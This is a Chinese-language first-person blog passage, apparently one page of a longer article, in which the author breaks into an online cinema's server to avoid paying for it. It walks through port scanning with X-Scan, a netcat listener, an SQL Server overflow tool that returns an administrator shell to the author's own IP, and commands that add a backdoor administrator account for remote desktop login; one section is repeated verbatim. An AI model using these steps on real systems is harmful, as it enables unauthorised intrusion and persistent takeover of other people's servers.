最近對網上看電影比較感興趣,於是登錄至某“在線影院”。本以為是免費,誰知問我要賬號和密碼,我可不想為這個掏錢。怎麼辦?先探探路。對我而言,入侵的過程是充滿樂趣的,它刺激著我大腦的每一根神經,讓我興奮無比。我喜歡體味這種思維無拘放蕩的快感,我喜歡沉醉其中。這是黑客營人的風格。於是,X-Scan開始勤懇地跑在了我的桌面上。
破門:久違的溢出工具
用X-Scan對該站點的Server掃描結果出來了,開的端口還不少呢:53、80、1433、3389。可並沒有報告說發現有弱口令,看來網管還算比較有責任心。但開了3389端口,意味著可以遠程登錄,這可是微軟給所有Windows用戶獻上的最大的“木馬”。
通過觀察,我發現只有在1433端口上下點工夫,想想辦法。何不用SQL2溢出工具試試?
先開一個cmd窗口,祭出寶刀netcat,在命令提示符下敲入“netcat -l -p 99”,監聽本地99端口。接著該SQL2出馬了。再打開一個cmd窗口,鍵入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是對方IP,61.157.*.*是我自己的IP,回車後提示package sent successful。再回過頭去看看監聽本地端口的netcat,已經變成了C:\WinNT\system32\_,這就是對方機器的系統文件夾了,看來是成功溢出了,就這麼簡單。
我很幸運地得到了對方的一個Shell,而且還是administrator權限的。接下來的操作就輕車熟路了,添加用戶,提升權限:在提示符下鍵入“net user hacker 12345 /add”(在對方機器裡創建一個名為hacker,密碼為12345的用戶),再鍵入“net localgroup administrators hacker /add”(把用戶hacker加入到管理員組),接下來就該是3389遠程登錄了。
破門:久違的溢出工具
用X-Scan對該站點的Server掃描結果出來了,開的端口還不少呢:53、80、1433、3389。可並沒有報告說發現有弱口令,看來網管還算比較有責任心。但開了3389端口,意味著可以遠程登錄,這可是微軟給所有Windows用戶獻上的最大的“木馬”。
通過觀察,我發現只有在1433端口上下點工夫,想想辦法。何不用SQL2溢出工具試試?
先開一個cmd窗口,祭出寶刀netcat,在命令提示符下敲入“netcat -l -p 99”,監聽本地99端口。接著該SQL2出馬了。再打開一個cmd窗口,鍵入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是對方IP,61.157.*.*是我自己的IP,回車後提示package sent successful。再回過頭去看看監聽本地端口的netcat,已經變成了C:\WinNT\system32\_,這就是對方機器的系統文件夾了,看來是成功溢出了,就這麼簡單。
我很幸運地得到了對方的一個Shell,而且還是administrator權限的。接下來的操作就輕車熟路了,添加用戶,提升權限:在提示符下鍵入“net user hacker 12345 /add”(在對方機器裡創建一個名為hacker,密碼為12345的用戶),再鍵入“net localgroup administrators hacker /add”(把用戶hacker加入到管理員組),接下來就該是3389遠程登錄了。 12下一頁閱讀全文